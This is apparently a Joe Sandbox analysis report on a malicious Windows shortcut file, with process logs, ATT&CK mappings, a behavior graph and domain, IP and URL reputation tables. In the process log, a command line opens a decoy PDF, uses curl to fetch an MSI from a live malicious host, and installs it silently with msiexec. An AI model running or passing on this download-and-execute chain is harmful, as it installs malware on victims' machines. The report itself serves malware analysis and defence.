      Source: Web Data.12.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
      Source: Web Data.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
      Source: Web Data.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
      Source: Web Data.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonlyJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msiJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qnJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe Taskkill /f /im cmd.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe Taskkill /f /im cmd.exeJump to behavior
      Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -slo c:\users\user\appdata\local\temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i c:\users\user\appdata\local\temp\bosfortuy.ms /qn | taskkill /f /im cmd.exe
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation
      1
      DLL Side-Loading
      111
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      Security Software Discovery
      Remote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Command and Scripting Interpreter
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      1
      Disable or Modify Tools
      LSASS Memory1
      Process Discovery
      Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
      Process Injection
      Security Account Manager1
      File and Directory Discovery
      SMB/Windows Admin SharesData from Network Shared Drive4
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      DLL Side-Loading
      NTDS2
      System Information Discovery
      Distributed Component Object ModelInput Capture15
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632262 Sample: thUKanu6GD.lnk Startdate: 07/03/2025 Architecture: WINDOWS Score: 92 48 559236.na3.to 2->48 56 Antivirus detection for URL or domain 2->56 58 Windows shortcut file (LNK) starts blacklisted processes 2->58 60 Multi AV Scanner detection for submitted file 2->60 62 4 other signatures 2->62 8 cmd.exe 2 2->8         started        10 msedge.exe 57 451 2->10         started        14 msiexec.exe 2->14         started        signatures3 process4 dnsIp5 16 curl.exe 2 8->16         started        20 msedge.exe 9 8->20         started        22 taskkill.exe 1 8->22         started        30 2 other processes 8->30 50 192.168.2.23 unknown unknown 10->50 52 192.168.2.24 unknown unknown 10->52 54 2 other IPs or domains 10->54 64 Maps a DLL or memory area into another process 10->64 24 msedge.exe 22 10->24         started        26 msedge.exe 10->26         started        28 msedge.exe 10->28         started        32 4 other processes 10->32 signatures6 process7 dnsIp8 38 559236.na3.to 188.114.96.3, 49689, 80 CLOUDFLARENETUS European Union 16->38 40 127.0.0.1 unknown unknown 16->40 36 C:\Users\user\AppData\Local\...\bosfortuy.ms, HTML 16->36 dropped 34 msedge.exe 20->34         started        42 p-defr00.kxcdn.com 185.172.148.132, 443, 49690, 49713 PROINITYPROINITYDE Germany 24->42 44 68.70.205.3, 443, 50264, 50265 PROINITYPROINITYDE Switzerland 24->44 46 13 other IPs or domains 24->46 file9 process10

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      thUKanu6GD.lnk19%VirustotalBrowse
      thUKanu6GD.lnk13%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://559236.na3.to/gift/setup4391.msiV0%Avira URL Cloudsafe
      https://drive-staging.corp.google.com/0%Avira URL Cloudsafe
      http://559236.na3.to/gift/setup4391.msi100%Avira URL Cloudmalware
      https://drive-daily-4.corp.google.com/0%Avira URL Cloudsafe
      https://drive-autopush.corp.google.com/0%Avira URL Cloudsafe
      https://drive-daily-2.corp.google.com/0%Avira URL Cloudsafe
      https://drive-daily-6.corp.google.com/0%Avira URL Cloudsafe
      http://559236.na3.to/gift/setup4391.msi20%Avira URL Cloudsafe
      https://drive-daily-1.corp.google.com/0%Avira URL Cloudsafe
      https://drive-daily-5.corp.google.com/0%Avira URL Cloudsafe
      https://drive-daily-0.corp.google.com/0%Avira URL Cloudsafe
      https://drive-preprod.corp.google.com/0%Avira URL Cloudsafe
      https://drive-daily-3.corp.google.com/0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      p-defr00.kxcdn.com
      185.172.148.132
      truefalse
        high
        chrome.cloudflare-dns.com
        162.159.61.3
        truefalse
          high
          559236.na3.to
          188.114.96.3
          truetrue
            unknown
            a416.dscd.akamai.net
            2.22.242.11
            truefalse
              high
              ssl.bingadsedgeextension-prod-europe.azurewebsites.net
              94.245.104.56
              truefalse
                high
                googlehosted.l.googleusercontent.com
                142.250.185.161
                truefalse
                  high
                  clients2.googleusercontent.com
                  unknown
                  unknownfalse
                    high
                    bzib.nelreports.net
                    unknown
                    unknownfalse
                      high
                      s28.q4cdn.com
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://559236.na3.to/gift/setup4391.msitrue
                        • Avira URL Cloud: malware
                        unknown
                        https://s28.q4cdn.com/favicon.icofalse
                          high
                          https://clients2.googleusercontent.com/crx/blobs/Ad_brx23lef_cW590ESOTTAroOhZ9si0XFJIUC52j2ILHW1VLB5ou6c0RgLWwGr1aRJJZ0WPNyiPBYgIpWfykvhKW-6BLzMRsp9ykw5f6ReBQmPpO6WB9pcSJPfykLTHDjYAxlKa5bf72z8tHS5eXuTavTP1h4WZBjSs/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_89_1_0.crxfalse
                            high
                            https://bzib.nelreports.net/api/report?cat=bingbusinessfalse
                              high
                              https://chrome.cloudflare-dns.com/dns-queryfalse
                                high
                                https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdffalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.cloudflare.com/learning/access-management/phishing-attack/curl.exe, 00000006.00000003.1291868369.000001BE71260000.00000004.00000020.00020000.00000000.sdmp, bosfortuy.ms.6.drfalse
                                    high
                                    https://duckduckgo.com/chrome_newtabWeb Data.12.drfalse
                                      high
                                      http://559236.na3.to/gift/setup4391.msiVcurl.exe, 00000006.00000003.1292046582.000001BE71256000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000003.1291995920.000001BE71253000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000002.1292839683.000001BE71256000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://web.whatsapp.com2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                        high
                                        https://duckduckgo.com/ac/?q=Web Data.12.drfalse
                                          high
                                          https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                            high
                                            https://m.kugou.com/2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                              high
                                              https://www.office.com2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                high
                                                https://outlook.live.com/mail/0/2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                  high
                                                  https://www.last.fm/2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                    high
                                                    https://powerpoint.new?from=EdgeM365Shoreline2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                      high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Web Data.12.drfalse
                                                        high
                                                        https://deff.nelreports.net/api/report?cat=msnReporting and NEL.13.drfalse
                                                          high
                                                          https://tidal.com/2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                            high
                                                            https://docs.google.com/manifest.json0.12.drfalse
                                                              high
                                                              https://www.youtube.com2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                high
                                                                https://www.instagram.com2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                  high
                                                                  https://web.skype.com/?browsername=edge_canary_shoreline2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                    high
                                                                    https://gaana.com/2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                      high
                                                                      https://drive-staging.corp.google.com/manifest.json0.12.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://drive.google.com/manifest.json0.12.drfalse
                                                                        high
                                                                        https://outlook.live.com/mail/compose?isExtension=true2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                          high
                                                                          https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=12ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                            high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchWeb Data.12.drfalse
                                                                              high
                                                                              https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=22ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                high
                                                                                https://www.messenger.com2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                  high
                                                                                  https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                    high
                                                                                    https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                      high
                                                                                      https://outlook.office.com/mail/compose?isExtension=true2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                        high
                                                                                        https://unitedstates4.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.drfalse
                                                                                          high
                                                                                          https://i.y.qq.com/n2/m/index.html2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                            high
                                                                                            https://www.deezer.com/2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                              high
                                                                                              https://latest.web.skype.com/?browsername=edge_canary_shoreline2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                high
                                                                                                https://s28.q4cdn.comSession_13385853608423166.12.drfalse
                                                                                                  high
                                                                                                  https://word.new?from=EdgeM365Shoreline2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                    high
                                                                                                    https://web.telegram.org/2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                      high
                                                                                                      https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                        high
                                                                                                        https://outlook.office.com/mail/0/2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                          high
                                                                                                          https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                            high
                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoWeb Data.12.drfalse
                                                                                                              high
                                                                                                              https://m.soundcloud.com/2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                                high
                                                                                                                https://mail.google.com/mail/mu/mp/266/#tl/Inbox2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                                  high
                                                                                                                  https://cdnjs.cloudflare.com/ajax/libs/mathjax/service_worker_bin_prod.js.12.dr, offscreendocument_main.js.12.drfalse
                                                                                                                    high
                                                                                                                    https://drive-daily-2.corp.google.com/manifest.json0.12.drfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://drive-autopush.corp.google.com/manifest.json0.12.drfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://music.amazon.com2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                                      high
                                                                                                                      https://drive-daily-4.corp.google.com/manifest.json0.12.drfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://vibe.naver.com/today2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                                        high
                                                                                                                        https://unitedstates1.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.drfalse
                                                                                                                          high
                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Web Data.12.drfalse
                                                                                                                            high
                                                                                                                            https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                                              high
                                                                                                                              https://open.spotify.com2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                                                high
                                                                                                                                https://twitter.com/2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                                                  high
                                                                                                                                  https://drive-daily-1.corp.google.com/manifest.json0.12.drfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://excel.new?from=EdgeM365Shoreline2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                                                    high
                                                                                                                                    https://web.skype.com/?browsername=edge_stable_shoreline2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                                                      high
                                                                                                                                      https://www.onenote.com/stickynotesstaging?isEdgeHub=true2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                                                        high
                                                                                                                                        https://drive-daily-5.corp.google.com/manifest.json0.12.drfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://m.vk.com/2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                                                          high
                                                                                                                                          https://www.cloudflare.com/5xx-error-landingcurl.exe, 00000006.00000003.1291868369.000001BE71260000.00000004.00000020.00020000.00000000.sdmp, bosfortuy.ms.6.drfalse
                                                                                                                                            high
                                                                                                                                            https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdfThisHistory.12.drfalse
                                                                                                                                              high
                                                                                                                                              https://www.google.com/chromecontent.js.12.dr, content_new.js.12.drfalse
                                                                                                                                                high
                                                                                                                                                https://www.tiktok.com/2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                                                                  high
                                                                                                                                                  http://559236.na3.to/gift/setup4391.msi2curl.exe, 00000006.00000003.1292046582.000001BE71256000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000003.1291995920.000001BE71253000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000002.1292839683.000001BE71256000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://drive-daily-6.corp.google.com/manifest.json0.12.drfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://drive-daily-0.corp.google.com/manifest.json0.12.drfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://www.onenote.com/stickynotes?isEdgeHub=true2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.iheart.com/podcast/2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://music.yandex.com2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://chromewebstore.google.com/manifest.json.12.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://s28.q4cdn.com/000003.log.12.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://drive-preprod.corp.google.com/manifest.json0.12.drfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://clients2.googleusercontent.comc3c0b809-94b6-4f44-893d-1b9e51a3b060.tmp.13.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.onenote.com/stickynotes?isEdgeHub=true&auth=22ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.onenote.com/stickynotes?isEdgeHub=true&auth=12ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://chrome.google.com/webstore/manifest.json.12.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://y.music.163.com/m/2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://unitedstates2.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://bard.google.com/2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://drive-daily-3.corp.google.com/manifest.json0.12.drfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                          2.22.242.11
                                                                                                                                                                          a416.dscd.akamai.netEuropean Union
                                                                                                                                                                          20940AKAMAI-ASN1EUfalse
                                                                                                                                                                          162.159.61.3
                                                                                                                                                                          chrome.cloudflare-dns.comUnited States
                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                          23.40.179.56
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          16625AKAMAI-ASUSfalse
                                                                                                                                                                          142.250.185.161
                                                                                                                                                                          googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          185.172.148.132
                                                                                                                                                                          p-defr00.kxcdn.comGermany
                                                                                                                                                                          44239PROINITYPROINITYDEfalse
                                                                                                                                                                          172.64.41.3
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                          23.57.90.163
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          35994AKAMAI-ASUSfalse
                                                                                                                                                                          68.70.205.3
                                                                                                                                                                          unknownSwitzerland
                                                                                                                                                                          44239PROINITYPROINITYDEfalse
                                                                                                                                                                          239.255.255.250
                                                                                                                                                                          unknownReserved
                                                                                                                                                                          unknownunknownfalse
                                                                                                                                                                          188.114.96.3
                                                                                                                                                                          559236.na3.toEuropean Union
                                                                                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                                                                                          IP
                                                                                                                                                                          192.168.2.6
                                                                                                                                                                          192.168.2.24
                                                                                                                                                                          192.168.2.23
                                                                                                                                                                          127.0.0.1
                                                                                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                          Analysis ID:1632262
                                                                                                                                                                          Start date and time:2025-03-07 21:39:00 +01:00
                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                          Overall analysis duration:0h 5m 13s
                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                          Report type:full
                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                          Number of analysed new started processes analysed:30
                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                          Technologies:
                                                                                                                                                                          • HCA enabled
                                                                                                                                                                          • EGA enabled
                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                          Sample name:thUKanu6GD.lnk
                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                          Original Sample Name:0a9302f5cbdcc6a3d75a904c947c9147.lnk
                                                                                                                                                                          Detection:MAL
                                                                                                                                                                          Classification:mal92.phis.troj.evad.winLNK@63/301@15/14
                                                                                                                                                                          EGA Information:Failed
                                                                                                                                                                          HCA Information:
                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                          • Number of executed functions: 0
                                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                          • Found application associated with file extension: .lnk
                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, RuntimeBroker.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 13.107.42.16, 4.175.223.124, 204.79.197.239, 13.107.21.239, 142.250.186.46, 13.107.6.158, 2.23.227.215, 2.23.227.208, 48.209.162.134, 84.201.210.39, 199.232.214.172, 142.251.40.35, 142.250.72.131, 23.199.214.10, 94.245.104.56, 23.40.179.38, 13.107.246.40, 13.107.22.239
                                                                                                                                                                          • Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, config.edge.skype.com.trafficmanager.net, data-edge.smartscreen.microsoft.com, prod-agic-we-10.westeurope.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, config-edge-skype.l-0007.l-msedge.net, msedge.b.tlu.dl.delivery.mp.microsoft.com, www.gstatic.com, l-0007.l-msedge.net, c.pki.goog, config.edge.skype.com, www.bing.com, prod-agic-ne-5.northeurope.cloudapp.azure.com, edge-microsoft-com.dual-a-0036.a-msedge.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, api.edgeoffer.microsoft.com, ctldl.windowsupdate.com, prod-atm-wds-edge.trafficmanager.net, b-0005.b-msedge.net, www-www.bing.com.trafficmanager.net, edge.microsoft.com, business-bing-com.b-0005.b-msedge.net, l-0007.config.skype.com, edgeassetservice.azureedge.net, business.bing.com, clients.l.google.com, msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com, dual-a-0036.a-msedge.net
                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                          • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                          No simulations
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          162.159.61.3file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                            ADFoyxP.exeGet hashmaliciousKeyLogger, StormKitty, VenomRATBrowse
                                                                                                                                                                              desaremix.exeGet hashmaliciousKillMBRBrowse
                                                                                                                                                                                https://www.flipsnack.com/859EECFF8D6/distribution-agreement/full-view.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                  ATTACH - kotak.com.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    https://zsharepointonlinems.mysteriousroutes.it.com/kOPeS/#fuck@you.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      ATTACH - kotak.com.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        Ocean-City.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          Urgent Suspicious Scam Email.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            Details of the selected transactions_169371_389366169134432.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              23.40.179.56http://monuadz.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                2.22.242.11https://www.flipsnack.com/859EECFF8D6/distribution-agreement/full-view.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                  https://zsharepointonlinems.mysteriousroutes.it.com/kOPeS/#fuck@you.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    09.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                      95.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                        SecuriteInfo.com.Trojan.Inject5.17530.4675.11921.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          windows.ps1Get hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                                                                                                            https://tampopo304-my.sharepoint.com/personal/t_peter_tampopo_co_uk/_layouts/15/guestaccess.aspx?share=ErD6Vn1_jHJCkzNA55SF53AB1bLxHPSyAiXwDO2SC9GB1Q&e=F2hCiyGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                                                                                                                                              UPS_ZI100035519.pdf.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                https://ncdmv.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  https://seieroebygdk-my.sharepoint.com/:o:/g/personal/morten_seieroebyg_dk/Ejxu7S81ekRMjqiJkW6WADwBVmUFVEVwgQ5ayasL1fZKQw?e=sbDbQeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    185.172.148.132http://ciso2ciso.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      Final Call Smart Manufacturing Excellence Munich (196Mo).msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        http://drawi.ioGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          http://t6ceb4773.emailsys2a.net/c/258/8051645/427/0/475433/1/7220/750cd846a5.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            https://www.drawnames.com/wishlist/edit/D0gYBJzjFoJ7rv0HFu_iKQ-/JAvmRE-y4vYaeZ2GN316lg-Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              http://www.drawnames.com/wishlist/add/GeoZyywvK48h1oNNizPuIQ-/W47fz4Y7Ik4eooK-94HN8w-Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                https://www.drawnames.com/wishlist/draw/GeoZyywvK48h1oNNizPuIQ-/W47fz4Y7Ik4eooK-94HN8w-/4Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  https://c3y3jw.webwave.dev/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    https://unrecognized-yahoo-activity.netlify.app/account/remove-unrecognize-apps/?email=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      http://bucolic-kheer-bd252e.netlify.app/Get hashmaliciousPorn ScamBrowse
                                                                                                                                                                                                                                        172.64.41.3file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          ADFoyxP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            ADFoyxP.exeGet hashmaliciousKeyLogger, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                                              https://www.flipsnack.com/859EECFF8D6/distribution-agreement/full-view.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                ATTACH - kotak.com.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  https://zsharepointonlinems.mysteriousroutes.it.com/kOPeS/#fuck@you.comGet hashmaliciousUnknownBrowse
